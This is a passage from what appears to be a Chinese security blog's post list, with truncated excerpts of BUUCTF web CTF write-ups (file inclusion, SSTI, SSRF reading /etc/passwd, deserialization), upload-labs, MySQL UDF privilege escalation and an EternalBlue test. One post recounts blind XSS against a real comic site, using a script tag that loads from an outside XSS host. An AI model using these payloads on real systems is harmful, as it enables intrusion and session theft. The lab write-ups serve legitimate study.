- 博客(13)
- 资源 (2)
- 收藏
- 关注
RSS订阅原创 BUUCTF-[极客大挑战 2019]BuyFlag
BUUCTF-[极客大挑战 2019]BuyFlag进去一看,哦原来是某安全团队的招募启示。但没看到什么有用的信息,看到了Q群号,我还以为是一道社工题(=_=)来到pay.php看一下源码,发现了一串代码。<!-- ~~~post money and password~~~if (isset($_POST['password'])) { $password = $_POST['password']; if (is_numeric($password)) { echo "pas
2021-05-27 15:43:54
240
原创 BUUCTF-[CISCN2019 总决赛 Day2 Web1]Easyweb
BUUCTF-[CISCN2019 总决赛 Day2 Web1]Easyweb就给了一个这个。。。先打上robots.txt看看发现有源码备份,但不是index.php.bak。。。看源码发现有image.php试一下,源码备份成功<?phpinclude "config.php";$id=isset($_GET["id"])?$_GET["id"]:"1";$path=isset($_GET["path"])?$_GET["path"]:"";$id=addslashes(
2021-05-14 16:30:11
710
原创 BUUCTF-[CISCN2019 华北赛区 Day1 Web2]ikun
BUUCTF-[CISCN2019 华北赛区 Day1 Web2]ikun鸡你太美看一下网页这段视频真不错!!!好了,看题开始让我们先注册一个账号,登陆后竟然有¥1000ikun们冲鸭,一定要买到Lv6让我们买到Lv6,上脚本找一下import requestsfrom time import *url="http://6777eeab-1fd2-4a3c-b124-d2ac0b67fd9b.node3.buuoj.cn/shop?page={}"for i in range(1
2021-05-14 10:59:18
612
原创 BUUCTF-[CISCN2019 华北赛区 Day1 Web5]CyberPunk
BUUCTF-[CISCN2019 华北赛区 Day1 Web5]CyberPunk看题看源码有提示?file=?文件包含漏洞,可以利用这个漏洞读取源码。分析index.php?file=php://filter/read=convert.base64-encode/resource=change.php挨个读取完后,base64解码后,在change.php发现了一点问题<?phprequire_once "config.php";if(!empty($_POST["us
2021-05-13 15:38:20
496
原创 BUUCTF-[CISCN2019 华东北赛区]Web2
BUUCTF-[CISCN2019 华东北赛区]Web2看题一个论坛,内容不错:)可以投稿,点击投稿发现要注册,那就先注册登录。随便账号密码就行。常规操作,扫一下站点,发现有admin.php,进行访问思路有session,可以确定一个思路,获取管理员的session得到权限,然后拿到flag执行去投稿,发现存在XSS漏洞,但是有一些过滤,''(''被转义成了"(",存在WAF,先转码,然后eval执行JS代码,并且需要一个window.location.href来自动触发刷新页面使用
2021-05-13 11:52:03
488
4
原创 BUUCTF-[CISCN2019 华东南赛区]Web11
BUU-CTF[CISCN2019 华东南赛区]Web11页面最下端有提示Build with Smarty !确定页面使用的是Smarty模板引擎。输入{$smarty.version}就可以看到返回的smarty的版本号,该题目的Smarty版本是3.1。但Smarty已经废弃{php}标签,强烈建议不要使用。在Smarty 3.1,{php}仅在SmartyBC中可用。在页面右上角给出了IP,所以可以通过这里进行注入。BurpSuite抓包,添加X-Forwarded-For: {if r
2021-05-13 09:14:58
264
原创 BUUCTF-[CISCN2019 华东南赛区]Web4
BUUCTF-[CISCN2019 华东南赛区]Web4看题点击Read somethings,会跳转到http://3fd8b1f9-614f-47ff-8e79-0f678e7bb4eb.node3.buuoj.cn/read?url=https://baidu.com看url应该不是PHP,因为PHP几乎没有用这种路由,直接猜flask。使用read?url=local_file:///etc/passwd读取内容。读取源码:read?url=local_file:///app/app.
2021-05-12 20:59:30
524
1
原创 BUUCTF-[网鼎杯 2020 青龙组]AreUSerialz
BUUCTF-[网鼎杯 2020 青龙组]AreUSerialz看题<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/t
2021-04-27 09:25:15
271
原创 第一次实战:XX漫画的XSS盲打
记一次实战:XX漫画的XSS盲打XSS盲打盲打只是一种惯称的说法,就是不知道后台不知道有没有xss存在的情况下,不顾一切的输入xss代码在留言啊投诉窗口啊之类的地方,尽可能多的尝试xss的语句与语句的存在方式,就叫盲打。一句话,就是干,使劲干。Interesting的发现看的王X洋是血脉喷张、欲罢不能。看着看着居然要充值,这不好使,师哥告诉过我们:“要白嫖。”随后让我们点开问题反馈XSS payload<sCRiPt sRC=https://xssaq.com/rHOw><
2021-03-26 20:28:26
1841
原创 upload-labs通关记录
upload-labs源码地址upload-labs(github)PASS-1 JS检查直接BurpSuite抓包改包将上传的图片????后缀由图片jpg、png等改为php脚本,然后上传即可PASS-2 type修改
2021-03-17 20:36:20
133
原创 MySQL提权
提权MySQL两种提权方式udf提权,mof提权MySQL_UDF提权要求:1.目标系统是Windows(Win2000,XP,Win2003);2.拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数3.有root账号密码 导出udf: MYSQL 5.1以上版本,必须要把udf.dll文件放到MYSQL安装目录下的lib\plugin文件夹下才能创建自定义函数 可以再mysql里输入select @@basedirshow variable
2021-03-05 19:30:15
131
原创 EternalBlue永恒之蓝渗透测试
Eternal Blue(永恒之蓝)-ms17-010渗透测试第一次做的渗透测试,也是第一次去写博客,还望各位师傅多多指正 :)工具1.靶机系统 window7 开放445以及139端口2.kali-Linux虚拟机注意保证靶机与主机IP位于同一网段(可用ping命令进行检测)0x01 更新metasploit在kali终端输入msfconsole然后输入apt-get install metaspolit-framework(要在root权限下,若不在,记得在命令前加入sudo,记得输入密
2021-03-05 18:47:46
547
原创 网络安全笔记
1、拿到一个待检测的站,你觉得应该先做什么?(web渗透的最终结果是获取到服务器的权限)第一步:信息收集比如说whois查询,TG查询,google查询 或者说查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞或者说查看服务器操作系统版本,web中间件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞 &n
2021-03-03 19:11:26
187
2
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人